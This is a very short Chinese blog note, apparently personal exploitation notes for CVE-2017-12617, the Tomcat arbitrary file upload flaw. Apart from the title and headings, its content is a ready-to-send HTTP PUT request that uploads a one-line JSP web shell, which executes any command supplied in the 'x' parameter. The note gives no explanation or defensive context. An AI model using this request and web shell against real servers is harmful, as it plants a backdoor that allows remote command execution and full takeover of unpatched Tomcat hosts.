【笔记】CVE-2017-12617漏洞利用

发表于 阅读次数:

前言

Tomcat任意文件上传漏洞

exp

request
1
2
3
4
PUT /xxx.jsp/
Content-Type: application/x-www-form-urlencoded

<% Runtime.getRuntime().exec(request.getParameter("x")); %>

完成